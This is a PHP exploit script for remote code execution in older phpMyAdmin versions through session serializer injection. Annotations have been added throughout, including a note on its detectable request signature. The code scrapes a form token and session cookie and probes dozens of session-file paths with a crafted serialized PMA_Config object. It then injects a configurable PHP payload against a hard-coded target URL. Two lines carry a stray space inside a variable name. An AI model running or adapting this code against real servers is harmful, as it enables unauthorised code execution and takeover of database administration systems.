  1. <?php
  2. /*
  3. phpMyAdmin < 3.3.10.2 & < 3.4.3.1 Session Serializer arbitrary PHP code execution exploit
  4. by M4g, ICQ 884888, http://snipper.ru, (c) 2011
  5. ---
  6. Required PHP version and settings on the target PMA installation: magic_quotes_gpc = off, PHP <= 5.2.13 & PHP <= 5.3.2
  7. ---
  8. Links & Thanks:
  9. 0. http://snipper.ru/view/103/phpmyadmin-33102-3431-session-serializer-arbitrary-php-code-execution-exploit/
  10. 1. http://php-security.org/2010/05/31/mops-2010-060-php-session-serializer-session-data-injection-vulnerability/index.html
  11. 2. https://rdot.org/forum/showthread.php?t=286
  12. 3. http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html
  13. 4. http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
  14. */
  15.  
  /*
   * Settings block. The two values below are consumed by the exploit flow
   * further down this file: $pmaurl is normalised to <base>/index.php and
   * $payload is sent as the _SESSION[payload] query parameter of the final
   * request. Nothing here is validated.
   */
  16. /*Settings*/
  17. $pmaurl = &#039;http://l2rf.ru/myadmin/&#039;; //full PMA url
  18. $payload = &#039;<?php phpinfo(); ?>&#039;; //PHP code to execute
  19. /*Settings*/
  20.  
  21. /*-------------------------------------------EXPLOIT CODE-------------------------------------------*/
  22.  
  // Shared redirect state for send_data(), accessed there through `global`:
  // the current depth of a Location-redirect chain and the cap after which
  // send_data() returns the string "Max redirects = N" instead of a response.
  23. $count_redirects = 0;
  24. $max_redirects = 5;
  25.  
  26. //отправляем http-данные
  27. //$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent, other headers, timeout, what to show = (0-all, 1-body, 2-headers), redirect = 0|1
  /**
   * Hand-rolled HTTP/1.1 client over a raw TCP socket.
   *
   * Assembles the request line and headers by string concatenation, writes
   * them with fsockopen()/fwrite(), reads until EOF (bounded) and returns the
   * response, optionally following one chain of Location redirects.
   *
   * @param string $method          GET or POST; any value other than POST is sent as GET
   * @param string $url             parsed with parse_url(); only host, path and query are
   *                                used - scheme and explicit port are ignored and the
   *                                connection always goes to TCP port 80 (no TLS)
   * @param string $data            GET: appended as the query string; POST: sent as the
   *                                body with a Content-Length header
   * @param string $referer_string  Referer header, emitted only when non-empty
   * @param string $cookie_string   Cookie header, emitted only when non-empty
   * @param string $ua_string       User-Agent header, always emitted
   * @param string $other_headers   appended to the request verbatim, so every extra
   *                                header must already end with its own CRLF
   * @param int    $timeout         fsockopen() connect timeout in seconds
   * @param int    $show            0 = whole raw response, 1 = body only, 2 = headers only
   * @param int    $follow_redirect when truthy, the first Location header of the response
   *                                is followed by a recursive call with the same arguments
   * @return string|array the response text (or the string "Max redirects = N" once the
   *                      redirect cap is hit); an array with errno/errstr keys when the
   *                      socket cannot be opened. Callers in this file never check for
   *                      the array case and hand the result straight to preg_match()
   *                      and stristr().
   */
  28. function send_data($method, $url, $data = &#039;&#039;, $referer_string = &#039;&#039;, $cookie_string = &#039;&#039;, $ua_string = &#039;Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8&#039;, $other_headers= &#039;&#039;, $timeout = 30, $show = 0, $follow_redirect=0)
  29. {
  // Redirect depth lives in file-level globals shared across the recursive calls.
  30. global $count_redirects,$max_redirects;
  31. $return = &#039;&#039;;
  32. $feof_count = 0;
  33.  
  // parse_url() returns only the components present in $url, so the path and
  // query keys may be missing (undefined-index notice, value null).
  34. $parsed_url = parse_url($url);
  35. $site = $parsed_url[&#039;host&#039;];
  36. $path = $parsed_url[&#039;path&#039;];
  37. $query = $parsed_url[&#039;query&#039;];
  38.  
  // Trailing underscores are stripped from the query/path unless the original
  // URL itself ended with one. Why this normalisation exists is not evident from
  // this file - TODO confirm against the callers.
  39. if(preg_match(&#039;@_$@i&#039;,$query) && !preg_match(&#039;@_$@i&#039;,$url))
  40. $query = rtrim($query,&#039;_&#039;);
  41.  
  42. if(preg_match(&#039;@_$@i&#039;,$path) && !preg_match(&#039;@_$@i&#039;,$url))
  43. $path = rtrim($path,&#039;_&#039;);
  44.  
  // Ternaries used as statements (the false branch is a discarded empty string).
  // For GET, $data replaces any query already present in $url; for POST the
  // original query stays on the request line and $data becomes the body.
  45. ($method == &#039;GET&#039; && !empty($data)) ? $path .= &#039;?&#039;.$data : &#039;&#039;;
  46. ($method == &#039;GET&#039; && !empty($query) && empty($data)) ? $path .= &#039;?&#039;.$query : &#039;&#039;;
  47. ($method == &#039;POST&#039; && !empty($query)) ? $path .= &#039;?&#039;.$query : &#039;&#039;;
  48.  
  // Always port 80: nothing from the URL scheme or port is consulted.
  49. if($fp = fsockopen($site, 80, $errno, $errstr, $timeout))
  50. {
  // Request assembly. "Connection: Close" asks the server to close the socket
  // after the response, which is what lets the feof() loop below terminate.
  51. ($method == &#039;POST&#039;) ? $out = "POST $path HTTP/1.1\r\n" : $out = "GET $path HTTP/1.1\r\n";
  52. $out .= "Host: $site\r\n";
  53. $out .= "Content-type: application/x-www-form-urlencoded\r\n";
  54. $out .= "Connection: Close\r\n";
  55. $out .= "User-Agent: $ua_string\r\n";
  56. !empty($referer_string) ? $out .= "Referer: $referer_string\r\n" : &#039;&#039;;
  57. !empty($cookie_string) ? $out .= "Cookie: $cookie_string\r\n" : &#039;&#039;;
  58. !empty($other_headers) ? $out .= $other_headers : &#039;&#039;;
  59. ($method == &#039;POST&#039;) ? $out .= "Content-Length: ".strlen($data)."\r\n\r\n" : $out .= "\r\n";
  60. ($method == &#039;POST&#039;) ? fwrite($fp, $out.$data) : fwrite($fp, $out);
  61.  
  // Bounded read: at most 10000 chunks of 4800 bytes, so a peer that never
  // closes the connection cannot keep this loop spinning indefinitely.
  62. while (!feof($fp))
  63. {
  64. if($feof_count >=10000)
  65. break;
  66.  
  67. $return .= fread($fp, 4800);
  68. ++$feof_count;
  69. }
  70.  
  71. fclose($fp);
  72.  
  // Redirects: only the first Location header is used, and it is followed by
  // recursing with the same arguments. $count_redirects is reset to 0 once the
  // nested call returns, so the cap bounds the depth of one redirect chain.
  // Hitting the cap returns a status string instead of a response.
  73. if($follow_redirect)
  74. {
  75. if($count_redirects<$max_redirects)
  76. {
  77. if(preg_match(&#039;@Location: (.+)@i&#039;,$return,$redirect_match))
  78. {
  79. $count_redirects++;
  80. $return = send_data($method, $redirect_match[1], $data, $referer_string, $cookie_string, $ua_string, $other_headers, $timeout, $show, $follow_redirect);
  81. $count_redirects = 0;
  82. }
  83. }
  84. else
  85. return &#039;Max redirects = &#039;.$max_redirects;
  86. }
  87.  
  // $show selects the part returned. The split is on the first blank line (the
  // header/body boundary); a response without one leaves $return[1] unset.
  88. if($show == 1)
  89. {
  90. $return = explode("\r\n\r\n",$return);
  91. $return = $return[1];
  92. }
  93. elseif($show == 2)
  94. {
  95. $return = explode("\r\n\r\n",$return);
  96. $return = $return[0];
  97. }
  98.  
  99. return $return;
  100. }
  // Connect failure: a different return shape (array), see @return above.
  101. else
  102. return array(&#039;errno&#039; => $errno, &#039;errstr&#039; => $errstr);
  103. }
  104.  
  // Target entry point: the configured base URL with a single trailing slash
  // plus index.php.
  105. $pmaurl = rtrim($pmaurl,&#039;/&#039;).&#039;/index.php&#039;;
  106.  
  // Candidate directories for the PHP session file (sess_<id>): absolute paths
  // first, then ../ variants that are presumably resolved relative to the PMA
  // install directory on the target (not verified here). The probe loop further
  // down tries them in this order and stops at the first one the target confirms,
  // so the order only changes how many requests are made, not the outcome.
  107. //Regards to asddas
  108. $sess_path = array(&#039;/tmp/&#039;,
  109. &#039;/var/tmp/&#039;,
  110. &#039;/var/lib/php/&#039;,
  111. &#039;/var/lib/php4/&#039;,
  112. &#039;/var/lib/php5/&#039;,
  113. &#039;/var/lib/php/session/&#039;,
  114. &#039;/var/lib/php4/session/&#039;,
  115. &#039;/var/lib/php5/session/&#039;,
  116. &#039;/shared/sessions&#039;,
  117. &#039;/var/php_sessions/&#039;,
  118. &#039;/var/sessions/&#039;,
  119. &#039;/tmp/php_sessions/&#039;,
  120. &#039;/tmp/sessions/&#039;,
  121. &#039;../../../tmp/&#039;,
  122. &#039;../../../../tmp/&#039;,
  123. &#039;../../../../../tmp/&#039;,
  124. &#039;../../../../../../tmp/&#039;,
  125. &#039;../../../../../../../tmp/&#039;,
  126. &#039;../../../temp/&#039;,
  127. &#039;../../../../temp/&#039;,
  128. &#039;../../../../../temp/&#039;,
  129. &#039;../../../../../../temp/&#039;,
  130. &#039;../../../../../../../temp/&#039;,
  131. &#039;../../../sessions/&#039;,
  132. &#039;../../../../sessions/&#039;,
  133. &#039;../../../../../sessions/&#039;,
  134. &#039;../../../../../../sessions/&#039;,
  135. &#039;../../../../../../../sessions/&#039;,
  136. &#039;../../../phptmp/&#039;,
  137. &#039;../../../../phptmp/&#039;,
  138. &#039;../../../../../phptmp/&#039;,
  139. &#039;../../../../../../phptmp/&#039;,
  140. &#039;../../../../../../../phptmp/&#039;);
  141.  
  // Step 1: fetch index.php once (default $show = 0, so headers and body are
  // both in $token_page) and scrape three things out of it: the hidden form
  // token, every Set-Cookie value, and the phpMyAdmin session cookie value.
  142. //1. Token, Session name and Cookies
  143. $token_page = send_data(&#039;GET&#039;,$pmaurl);
  144.  
  // The preg_match() result is not checked: $token_array[1] is unset when the
  // response carries no token field (e.g. a different page layout).
  145. preg_match(&#039;@name="token" value="([a-f0-9]{32})"@is&#039;,$token_page,$token_array);
  146.  
  147. $token = $token_array[1];
  148.  
  // Every Set-Cookie value (cut at the first ";" or line end) is joined into a
  // single Cookie header string so the later requests can send them back.
  // Note $cookie_array is reused: first the match array, then the joined string.
  149. preg_match_all(&#039;@Set-Cookie: ([^\r\n;]+)@is&#039;,$token_page,$cookie_array);
  150.  
  151. $cookie_array = $cookie_array[1];
  152. $cookie_array = implode("; ",$cookie_array);
  153.  
  // Session id: value of the phpMyAdmin cookie (32-40 alphanumerics). It is used
  // below to build the sess_<id> file name that is probed; again unchecked.
  154. preg_match(&#039;@phpMyAdmin=([a-z0-9]{32,40});?@is&#039;,$token_page,$session_array);
  155.  
  156. $session = $session_array[1];
  157.  
  // Step 2: probe each candidate directory. Every iteration sends two requests:
  //   1. index.php?session_to_unset=123&token=...&_SESSION[!bla]=<value>, where
  //      the value is a serialized-session-shaped string naming a PMA_Config
  //      object whose "source" is the candidate sess_<id> path;
  //   2. a plain reload of index.php with the token, whose response is searched
  //      for the literal "PMA_Config" as the success signal.
  // The first response is stored in $sess_test_page but never read; only the
  // second one is inspected.
  //
  // Detection/mitigation notes: a request to index.php whose query string
  // combines session_to_unset with a _SESSION[ parameter (value starting with
  // |xxx|a:1:{) is the observable signature of this probe and a reasonable
  // log/WAF match. The file header states the preconditions (magic_quotes_gpc
  // off, PHP <= 5.2.13 / 5.3.2) and that phpMyAdmin 3.3.10.2 / 3.4.3.1 are the
  // fixed versions.
  158. //2. Inject into session testing
  159.  
  160. $sess_test_page = &#039;&#039;;
  161. $o = 0;
  162. $good_inj = false;
  163.  
  // $good_inj becomes the matching path string on success; the if() after the
  // loop relies on string truthiness to tell the two states apart.
  164. do
  165. {
  166. $inj = $sess_path[$o].&#039;sess_&#039;.$session;
  167. $query = $pmaurl.&#039;?session_to_unset=123&token=&#039;.$token.&#039;&_SESSION[!bla]=&#039;.urlencode(&#039;|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:&#039;.strlen($inj).&#039;:"&#039;.$inj.&#039;";}}&#039;);
  168. $sess_test_page = send_data(&#039;GET&#039;,$query,&#039;&#039;,$pmaurl,$cookie_array);
  169. $sess_test_page2 = send_data(&#039;GET&#039;,$pmaurl.&#039;?token=&#039;.$token,&#039;&#039;,$pmaur l,$cookie_array);
  170.  
  171. if(stristr($sess_test_page2,&#039;PMA_Config&#039;))
  172. {
  173. $good_inj = $inj;
  // flush() runs before print, so it pushes out the previous iteration's
  // output, not this line.
  174. flush();
  175. print &#039;[+] &#039;.$inj.&#039; - good path<br/>&#039;;
  176. break;
  177. }
  178. else
  179. {
  180. flush();
  181. print &#039;[-] &#039;.$inj.&#039; - bad path<br/>&#039;;
  182. }
  183. $o++;
  184. }
  185. while($o < count($sess_path));
  186.  
  // Step 3: repeat the confirmed injection with the extra _SESSION[payload]
  // parameter (the $payload setting), reload index.php once more and dump the
  // raw response - headers included, since $show is left at its default of 0.
  187. if($good_inj)
  188. {
  189. $query = $pmaurl.&#039;?session_to_unset=123&token=&#039;.$token.&#039;&_SESSION[!bla]=&#039;.urlencode(&#039;|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:&#039;.strlen($good_inj).&#039;:"&#039;.$good_inj.&#039;";}}&#039;).&#039;&_SESSION[payload]=&#039;.urlencode($payload);
  190. $sess_test_page = send_data(&#039;GET&#039;,$query,&#039;&#039;,$pmaurl,$cookie_array);
  191. $sess_test_page2 = send_data(&#039;GET&#039;,$pmaurl.&#039;?token=&#039;.$token,&#039;&#039;,$pmaur l,$cookie_array);
  192.  
  193. print $sess_test_page2;
  194. }
  195. else
  196. die(&#039;[+] Session path was not found&#039;);